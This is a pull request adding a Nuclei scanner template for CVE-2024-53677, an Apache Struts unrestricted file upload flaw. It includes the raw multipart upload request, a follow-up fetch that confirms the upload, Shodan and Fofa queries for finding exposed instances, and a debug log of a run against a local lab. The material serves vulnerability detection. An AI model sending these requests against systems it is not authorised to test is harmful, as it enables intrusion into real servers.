### PR TITLE
feat: Add template for CVE-2024-53677

### DIFF
--- a/http/cves/2024/CVE-2024-53677.yaml
+++ b/http/cves/2024/CVE-2024-53677.yaml
@@ -1,0 +1,64 @@
+id: CVE-2024-53677
+
+info:
+  name: Apache Struts - Unrestricted File Upload
+  author: 0hmx
+  severity: critical
+  description: |
+    Apache Struts versions from 2.0.0 before 6.4.0 contain a file inclusion caused by flawed file upload logic, letting attackers manipulate upload parameters to perform path traversal and upload malicious files.
+  reference:
+    - https://github.com/r007sec/CVE-2024-53677
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53677
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-53677
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.title:"struts2 showcase"
+    fofa-query: title="struts2 showcase"
+    max-request: 2
+  tags: cve,cve2024,struts,apache,fileupload,rce,kev
+
+http:
+  - raw:
+      - |
+        POST /upload.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAb33D
+        
+        ------WebKitFormBoundaryAAb33D
+        Content-Disposition: form-data; name="Upload"; filename="poc.gif"
+        Content-Type: image/gif
+        
+        GIF89a;{{randstr}}
+        ------WebKitFormBoundaryAAb33D
+        Content-Disposition: form-data; name="uploadContentType"
+        
+        text/plain
+        ------WebKitFormBoundaryAAb33D
+        Content-Disposition: form-data; name="uploadFileName"
+        
+        {{randstr_1}}.txt
+        ------WebKitFormBoundaryAAb33D--
+
+    extractors:
+      - type: regex
+        name: extracted_path
+        group: 1
+        regex:
+          - 'src="([^"]+)"'
+        internal: true
+
+  - raw:
+      - |
+        GET /{{extracted_path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "{{randstr}}")'
+        condition: and


### PR DESCRIPTION
/claim #13040

This is my first time doing a CVF. Sorry if I break any of the rules, please let me know, I will do my best and improve it!🙏

This pull request adds a new template for CVE-2024-53677, a critical unrestricted file upload vulnerability in Apache Struts.

The template uses a two-step process: it first uploads a file and then uses a regex extractor to dynamically find the of the uploaded file from the response, making the highly reliable.

   - Added CVE-2024-53677
   - References:
     - https://github.com/r007sec/CVE-2024-53677
     - https://nvd.nist.gov/vuln/detail/CVE-2024-53677

  Template Validation

  I've validated this template locally?
   - [x] YES
   - [ ] NO

  Additional Details

   - Shodan Query: http.title:"struts2 showcase"
   - Fofa Query: title="struts2 showcase"
   - Test Environment: This template was validated against the
     `c4oocO/CVE-2024-53677-Docker` image, which has several
     specific quirks. The template is designed to handle this
     environment's requirements (e.g., capitalized Upload
     parameter, GIF content-type).

   - Matched Response Data:
   ```
   nuclei -t http/cves/2024/CVE-2024-53677.yaml -u http://localhost:8080 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-53677] Dumped HTTP request for http://localhost:8080/upload.action

POST /upload.action HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 422
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAb33D
Accept-Encoding: gzip

------WebKitFormBoundaryAAb33D
Content-Disposition: form-data; name="Upload"; filename="poc.gif"
Content-Type: image/gif

GIF89a;322XndoTQ9fVa1AcgJIDQzuPlC2
------WebKitFormBoundaryAAb33D
Content-Disposition: form-data; name="uploadContentType"

text/plain
------WebKitFormBoundaryAAb33D
Content-Disposition: form-data; name="uploadFileName"

322Xnd7o2eCY7ALt1mSXaUaNWqp.txt
------WebKitFormBoundaryAAb33D--
[DBG] [CVE-2024-53677] Dumped HTTP response http://localhost:8080/upload.action

HTTP/1.1 200 
Connection: close
Content-Length: 343
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cross-Origin-Embedder-Policy-Report-Only: require-corp
Cross-Origin-Opener-Policy: same-origin
Date: Sun, 31 Aug 2025 05:56:48 GMT
Set-Cookie: JSESSIONID=F46ADED969B75F3E2FB4183FA26C988D; Path=/; HttpOnly
Vary: Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,Sec-Fetch-User



<html>
<head>
  <title>File Upload - Success ✅</title>
</head>
<body>
<h2>File Upload - Success ✅</h2>


    
        File uploaded successfully 😊
    
    <img src="uploads/322Xnd7o2eCY7ALt1mSXaUaNWqp.txt" />




<br/>

<a href="/upload.action;jsessionid=F46ADED969B75F3E2FB4183FA26C988D">Go back to Upload Page</a>

</body>
</html>
[INF] [CVE-2024-53677] Dumped HTTP request for http://localhost:8080/uploads/322Xnd7o2eCY7ALt1mSXaUaNWqp.txt

GET /uploads/322Xnd7o2eCY7ALt1mSXaUaNWqp.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Cookie: JSESSIONID=F46ADED969B75F3E2FB4183FA26C988D
Accept-Encoding: gzip

[DBG] [CVE-2024-53677] Dumped HTTP response http://localhost:8080/uploads/322Xnd7o2eCY7ALt1mSXaUaNWqp.txt

HTTP/1.1 200 
Connection: close
Content-Length: 34
Accept-Ranges: bytes
Content-Language: en-US
Content-Type: text/plain;charset=UTF-8
Date: Sun, 31 Aug 2025 05:56:48 GMT
Etag: W/"34-1756619808251"
Last-Modified: Sun, 31 Aug 2025 05:56:48 GMT

GIF89a;322XndoTQ9fVa1AcgJIDQzuPlC2
[CVE-2024-53677:dsl-1] [http] [critical] http://localhost:8080/uploads/322Xnd7o2eCY7ALt1mSXaUaNWqp.txt
[INF] Scan completed in 35.413129ms. 1 matches found.
   ```